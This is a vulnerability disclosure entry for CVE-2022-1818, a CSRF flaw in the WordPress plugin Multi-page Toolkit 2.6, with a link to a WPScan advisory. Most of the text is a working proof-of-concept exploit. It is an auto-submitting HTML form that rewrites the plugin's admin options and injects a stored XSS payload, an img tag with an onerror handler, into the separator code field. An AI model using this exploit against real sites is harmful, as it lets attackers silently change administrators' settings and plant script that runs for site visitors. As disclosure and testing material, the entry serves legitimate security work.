CVE: CVE-2022-1818

Name: Multi-page Toolkit (multi-page-toolkit)

Version: 2.6

Date: 2022-04-21 15:10:55

Advisory: https://wpscan.com/vulnerability/9d6c628f-cdea-481c-a2e5-101dc167718d

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=TA_multi_toolkit.php" method="POST">
    <input type="text" name="mp1_display_all" value="True">
    <input type="text" name="mp1_display_all_text" value="View All">
    <input type="text" name="mp1_div_align" value="center">
    <input type="text" name="mp1_before" value="">
    <input type="text" name="mp1_after" value="">
    <input type="text" name="mp1_previouspagelink" value="«">
    <input type="text" name="mp1_nextpagelink" value="»">
    <input type="text" name="mp1_firstpagetext" value="On First Page">
    <input type="text" name="mp1_lastpagetext" value="On Last Page">
    <input type="text" name="mp1_quick_type" value="1">
    <input type="text" name="mp1_nav_type" value="2">
    <input type="text" name="mp1_nav_number" value="True">
    <input type="text" name="mp1_title_number" value="2">
    <input type="text" name="mp2_display_all" value="True">
    <input type="text" name="mp2_display_all_text" value="ALL">
    <input type="text" name="mp2_div_align" value="center">
    <input type="text" name="mp2_before" value="Page :">
    <input type="text" name="mp2_after" value="">
    <input type="text" name="mp2_previouspagelink" value="«">
    <input type="text" name="mp2_nextpagelink" value="»">
    <input type="text" name="mp2_firstpagetext" value="On First Page">
    <input type="text" name="mp2_lastpagetext" value="On Last Page">
    <input type="text" name="mp2_quick_type" value="2">
    <input type="text" name="mp2_nav_type" value="0">
    <input type="text" name="mp2_nav_number" value="True">
    <input type="text" name="mp2_title_number" value="2">
    <input type="text" name="seperator" value="2">
    <textarea name="seperator_code">--~~~~~~~~~~~~--
<img src=x onerror=alert(1)>
</textarea>
    <input type="text" name="ta_multipage_Submit" value="Update Options »">
    <input type="text" name="priority" value="99">
</form>
<script>
    document.forms[0].submit();
</script>